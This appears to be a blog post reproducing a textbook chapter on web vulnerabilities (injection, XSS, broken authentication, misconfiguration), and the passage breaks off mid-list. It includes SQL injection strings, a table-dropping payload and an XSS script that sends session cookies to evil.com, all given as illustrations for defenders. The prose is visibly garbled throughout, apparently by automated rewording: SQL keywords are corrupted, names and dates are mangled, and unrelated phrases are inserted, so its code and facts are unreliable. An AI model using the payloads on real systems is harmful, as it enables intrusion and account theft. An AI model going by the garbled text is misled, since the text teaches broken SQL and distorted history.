Log in Subscribe

Danger Landscape and Common Vulnerabilities

Clemmensen Kelley
· 11 min read
Danger Landscape and Common Vulnerabilities

# Chapter 5: Threat Landscape and Common Vulnerabilities
Just about every application operates inside an environment full associated with threats – malevolent actors constantly browsing for weaknesses to use. Understanding the threat landscape is vital for defense. In this chapter, we'll survey the most common varieties of app vulnerabilities and episodes seen in the wild today. We will discuss how they will work, provide practical samples of their écrasement, and introduce best practices in order to avoid all of them. This will put the groundwork for later chapters, which will delve deeper into how to build security into the development lifecycle and specific protection.



Over the yrs, certain categories regarding vulnerabilities have appeared as perennial issues, regularly appearing inside security assessments in addition to breach reports. Sector resources such as the OWASP Top 10 (for web applications) and even CWE Top 25 (common weaknesses enumeration) list these usual suspects. Let's explore some of the particular major ones:

## Injection Attacks (SQL, Command Injection, etc. )
- **Description**: Injection flaws happen when an app takes untrusted suggestions (often from a great user) and passes it into a good interpreter or command word in a way that alters typically the intended execution. The particular classic example is SQL Injection (SQLi) – where user input is concatenated into an SQL query without right sanitization, allowing the user to provide their own SQL commands. Similarly, Command word Injection involves inserting OS commands, LDAP Injection into LDAP queries, NoSQL Treatment in NoSQL databases, and so about. Essentially, the application neglects to distinguish info from code instructions.

- **How this works**: Consider a simple login form that takes a great username and password. If typically the server-side code naively constructs a query such as: `SELECT * FROM users WHERE login = 'alice' PLUS password = 'mypassword'; `, an attacker can input a thing like `username: alice' OR '1'='1` and even `password: anything`. The cake you produced SQL would get: `SELECT * COMING FROM users WHERE login name = 'alice' OR EVEN '1'='1' AND pass word = 'anything'; `. The `'1'='1'` situation always true can make the query return all users, effectively bypassing the particular password check. This particular is a standard example of SQL shot to force some sort of login.
More maliciously, an attacker can terminate the query through adding `; FALL TABLE users; --` to delete the users table (a destructive attack about integrity) or `; SELECT credit_card COMING FROM users; --` in order to dump sensitive files (a confidentiality breach).
- **Real-world impact**: SQL injection has been behind some of the largest data breaches on record. Many of us mentioned the Heartland Payment Systems break the rules of – in 08, attackers exploited a great SQL injection within a web application to ultimately penetrate inside systems and grab millions of credit card numbers​
TWINGATE. COM
. Another situation: the TalkTalk 2015 breach in britain, exactly where a teenager used SQL injection to reach the personal info of over one hundred fifty, 000 customers. The particular subsequent investigation exposed TalkTalk had still left an obsolete web site with an acknowledged SQLi flaw on-line, and hadn't patched a database susceptability from 2012​
ICO. ORG. UK

ICO. ORG. UNITED KINGDOM
. TalkTalk's CEO defined it as some sort of basic cyberattack; certainly, SQLi was well-understood for a decade, yet the company's failure to sterilize inputs and up-date software generated some sort of serious incident – they were fined and suffered reputational loss.
These illustrations show injection attacks can compromise discretion (steal data), ethics (modify or remove data), and availability (if data is definitely wiped, service is disrupted). Even nowadays, injection remains a new common attack vector. In fact, OWASP's 2021 Top Ten still lists Injection (including SQL, NoSQL, command injection, and so forth. ) being a top rated risk (category A03: 2021)​
IMPERVA. COM
.
- **Defense**: Typically the primary defense in opposition to injection is source validation and result escaping – ensure that any untrusted information is treated just as pure data, by no means as code. Employing prepared statements (parameterized queries) with certain variables is some sort of gold standard with regard to SQL: it isolates the SQL signal through the data ideals, so even in case an user goes in a weird thread, it won't crack the query composition. For example, using a parameterized query inside Java with JDBC, the previous logon query would turn out to be `SELECT * THROUGH users WHERE username =? AND password =? `, in addition to the `? ` placeholders are guaranteed to user inputs safely and securely (so `' OR PERHAPS '1'='1` would become treated literally since an username, which won't match virtually any real username, rather than part involving SQL logic). Comparable approaches exist with regard to other interpreters.
On top of that, whitelisting input acceptance can restrict what characters or format is allowed (e. g., an login could possibly be restricted to alphanumeric), stopping a lot of injection payloads at the front door​
IMPERVA. COM
. Likewise, encoding output properly (e. g. HTML encoding to prevent script injection) is key, which we'll cover under XSS.
Developers should never ever directly include organic input in directions. Secure frameworks in addition to ORM (Object-Relational Mapping) tools help by handling the query building for an individual. Finally, least freedom helps mitigate effect: the database account used by typically the app should include only necessary liberties – e. grams. it should not have DROP TABLE protection under the law if not needed, to prevent an injection from carrying out irreparable harm.

## Cross-Site Scripting (XSS)
- **Description**: Cross-Site Scripting identifies the class of vulnerabilities where an program includes malicious intrigue inside the context associated with a trusted internet site. Unlike injection into a server, XSS is about injecting in to the content of which other users see, commonly in the web web site, causing victim users' browsers to implement attacker-supplied script. At this time there are a several types of XSS: Stored XSS (the malicious script is definitely stored on the server, e. grams. in a database, plus served to other users), Reflected XSS (the script will be reflected off the storage space immediately in a response, often using a research query or mistake message), and DOM-based XSS (the susceptability is in client-side JavaScript that insecurely manipulates the DOM).

- **How it works**: Imagine a communication board where consumers can post feedback. If the program would not sanitize HTML tags in responses, an attacker can post a remark like: ` var i=new Image(); i. src="http://evil.com/steal?cookie="+document.cookie; `. Any customer who views that comment will accidentally run the script in their web browser. The script previously mentioned would send the user's session cookie to the attacker's server (stealing their own session, hence letting the attacker to be able to impersonate them upon the site – a confidentiality and even integrity breach).
Within a reflected XSS scenario, maybe the internet site shows your input with an error site: should you pass a script in the particular URL along with the internet site echoes it, that will execute inside the browser of the person who clicked that malevolent link.
Essentially, XSS turns the victim's browser into a great unwitting accomplice.
- **Real-world impact**: XSS can be very serious, especially about highly trusted websites (like social networks, web mail, banking portals). A famous early example was the Samy worm on MySpace in 2005. A user named Samy learned a stored XSS vulnerability in Facebook or myspace profiles. He designed a worm: a script that, if any user viewed his profile, this would add your pet as a friend and copy the particular script to the particular viewer's own account. Doing this, anyone more viewing their account got infected as well. Within just something like 20 hours of launch, over one mil users' profiles had run the worm's payload, making Samy one of the fastest-spreading infections coming from all time​
SOBRE. WIKIPEDIA. ORG
. Typically  zero trust security  displayed the phrase "but most regarding all, Samy is usually my hero" on profiles, a relatively harmless prank​
DURANTE. WIKIPEDIA. ORG
. Even so, it absolutely was a wake-up call: if a great XSS worm may add friends, it could just as quickly create stolen exclusive messages, spread junk e-mail, or done some other malicious actions upon behalf of customers. Samy faced legal consequences for this specific stunt​
EN. WIKIPEDIA. ORG
.
In one more scenario, XSS could be used in order to hijack accounts: with regard to instance, a shown XSS within a bank's site might be taken advantage of via a scam email that techniques an user into clicking an URL, which then executes a script to be able to transfer funds or even steal session tokens.
XSS vulnerabilities have got been found in websites like Twitter, Fb (early days), plus countless others – bug bounty courses commonly receive XSS reports. Even though many XSS bugs are regarding moderate severity (defaced UI, etc. ), some may be important if they let administrative account takeover or deliver adware and spyware to users.
-- **Defense**: The foundation of XSS defense is output coding. Any user-supplied written content that is displayed inside a page should be properly escaped/encoded so that that cannot be interpreted because active script. With regard to example, in the event that an end user writes ` bad() ` in an opinion, the server need to store it then output it because `< script> bad()< /script> ` and so that it shows up as harmless text message, not as an actual script. Modern day web frameworks generally provide template motors that automatically avoid variables, which helps prevent most reflected or even stored XSS by simply default.
Another essential defense is Content material Security Policy (CSP) – a header that instructs internet browsers to execute scripts from certain sources. A well-configured CSP can mitigate typically the impact of XSS by blocking inline scripts or exterior scripts that aren't explicitly allowed, nevertheless CSP may be complicated to set right up without affecting blog functionality.
For builders, it's also critical to stop practices like dynamically constructing HTML with raw information or using `eval()` on user insight in JavaScript. Internet applications can likewise sanitize input in order to strip out banned tags or attributes (though it is complicated to get perfect). In summary: validate and sanitize any kind of HTML or JavaScript inputs, use context-appropriate escaping (HTML break free for HTML information, JavaScript escape for data injected straight into scripts, etc. ), and consider permitting browser-side defenses like CSP.

## Cracked Authentication and Session Management
- **Description**: These vulnerabilities entail weaknesses in just how users authenticate to the application or maintain their authenticated session. "Broken authentication" can mean a variety of issues: allowing weak passwords, not avoiding brute force, declining to implement proper multi-factor authentication, or even exposing session IDs. "Session management" is closely related – once an user is logged inside of, the app normally uses a period cookie or expression to remember them; if that mechanism is definitely flawed (e. grams. predictable session IDs, not expiring periods, not securing the particular cookie), attackers may well hijack other users' sessions.

- **How it works**: Single common example will be websites that enforced overly simple password requirements or got no protection against trying many passwords. Attackers exploit this by using abilities stuffing (trying username/password pairs leaked from all other sites) or brute force (trying numerous combinations). If presently there are no lockouts or perhaps rate limits, a great attacker can systematically guess credentials.
Another example: if the application's session dessert (the item of info that identifies some sort of logged-in session) is definitely not marked with the Secure flag (so it's sent above HTTP as properly as HTTPS) or perhaps not marked HttpOnly (so it can easily be accessible to scripts), it would be stolen via network sniffing or XSS. Once an attacker has a valid treatment token (say, thieved from an unsafe Wi-Fi or via an XSS attack), they will impersonate of which user without needing credentials.
There have also been reason flaws where, intended for instance, the security password reset functionality is definitely weak – probably it's prone to a great attack where a great attacker can reset to zero someone else's pass word by modifying parameters (this crosses into insecure direct object references / access control too).
Overall, broken authentication addresses anything that permits an attacker in order to either gain qualifications illicitly or avoid the login using some flaw.
rapid **Real-world impact**: We've all seen news of massive "credential dumps" – millions of username/password sets floating around through past breaches. Opponents take these in addition to try them in other services (because a lot of people reuse passwords). This automated credential stuffing has led to compromises of high-profile accounts about various platforms.
A good example of broken auth was the case in the summer season where LinkedIn endured a breach in addition to 6. 5 mil password hashes (unsalted SHA-1) were leaked​
NEWS. SOPHOS. COM

NEWS. SOPHOS. COM
. The fragile hashing meant opponents cracked most involving those passwords inside hours​
NEWS. SOPHOS. COM

NEWS. SOPHOS. POSSUINDO
. Even worse, a few years later it turned out the infringement was actually a lot of larger (over a hundred million accounts). Folks often reuse passwords, so that breach had ripple outcomes across other web sites. LinkedIn's failing was initially in cryptography (they didn't salt or perhaps use a sturdy hash), which will be part of protecting authentication data.
Another commonplace incident type: treatment hijacking. For occasion, before most web sites adopted HTTPS all over the place, attackers on a single network (like an open Wi-Fi) could sniff biscuits and impersonate users – a risk popularized by the Firesheep tool in 2010, which let anyone eavesdrop on unencrypted sessions for sites love Facebook. This required web services in order to encrypt entire lessons, not just logon pages.
There have also been cases of mistaken multi-factor authentication implementations or login bypasses due to common sense errors (e. grams., an API that returns different text messages for valid versus invalid usernames may allow an opponent to enumerate customers, or even a poorly implemented "remember me" token that's easy in order to forge). The consequences associated with broken authentication are severe: unauthorized accessibility to user company accounts, data breaches, identification theft, or unauthorized transactions.
- **Defense**: Protecting authentication requires a multi-pronged approach:
-- Enforce strong username and password policies but within reason. Current NIST guidelines recommend letting users to choose long passwords (up to 64 chars) but not requiring recurrent changes unless there's indication of compromise​
JUMPCLOUD. COM

AUDITBOARD. COM
. Instead, check passwords against known breached password lists (to disallow "P@ssw0rd" and the particular like). Also inspire passphrases that are simpler to remember although hard to think.
- Implement multi-factor authentication (MFA). Some sort of password alone is usually often too few these days; providing a possibility (or requirement) for a second factor, such as an one-time code or even a push notification, significantly reduces the hazard of account endanger even if passwords leak. Many main breaches could possess been mitigated simply by MFA.
- Safe the session tokens. Use the Safeguarded flag on snacks so they usually are only sent above HTTPS, HttpOnly and so they aren't available via JavaScript (mitigating some XSS impact), and consider SameSite to prevent these people from being directed in CSRF assaults (more on CSRF later). Make treatment IDs long, randomly, and unpredictable (to prevent guessing).
-- Avoid exposing program IDs in URLs, because they could be logged or leaked out via referer headers. Always prefer snacks or authorization headers.
- Implement consideration lockout or throttling for login attempts. After say 5-10 failed attempts, both lock the be the cause of a period or increasingly delay replies. Utilize CAPTCHAs or perhaps other mechanisms when automated attempts usually are detected. However, become mindful of denial-of-service – some web pages opt for softer throttling to avoid letting attackers secure out users simply by trying bad account details repeatedly.
- Treatment timeout and logout: Expire sessions after a reasonable period regarding inactivity, and absolutely invalidate session as well on logout. It's surprising how a few apps in typically the past didn't appropriately invalidate server-side treatment records on logout, allowing tokens being re-used.
- Look closely at forgot password runs. Use secure bridal party or links via email, don't reveal whether an user exists or not really (to prevent customer enumeration), and assure those tokens end quickly.
Modern frameworks often handle a lot of this for you, but misconfigurations are routine (e. h., a developer may accidentally disable a new security feature). Regular audits and testing (like using OWASP ZAP or additional tools) can get issues like missing secure flags or perhaps weak password procedures.
Lastly, monitor authentication events. Unusual patterns (like a single IP trying thousands of user names, or one bank account experiencing a huge selection of been unsuccessful logins) should boost alarms. This terme conseillé with intrusion diagnosis.


To emphasize, OWASP's 2021 list calls this category Id and Authentication Problems (formerly "Broken Authentication") and highlights the importance of items like MFA, not applying default credentials, and implementing proper username and password handling​
IMPERVA. POSSUINDO
. They note of which 90% of applications tested had concerns in this area in some form, quite alarming.

## Security Misconfiguration
- **Description**: Misconfiguration isn't a single susceptability per se, nevertheless a broad course of mistakes throughout configuring the software or its environment that lead to insecurity. This may involve using standard credentials or settings, leaving unnecessary features enabled, misconfiguring safety measures headers, delete word solidifying the server. Essentially, the software might be secure in idea, nevertheless the way it's deployed or configured opens a hole.

- **How it works**: Examples associated with misconfiguration:
- Leaving behind default admin accounts/passwords active. Many software program packages or equipment historically shipped along with well-known defaults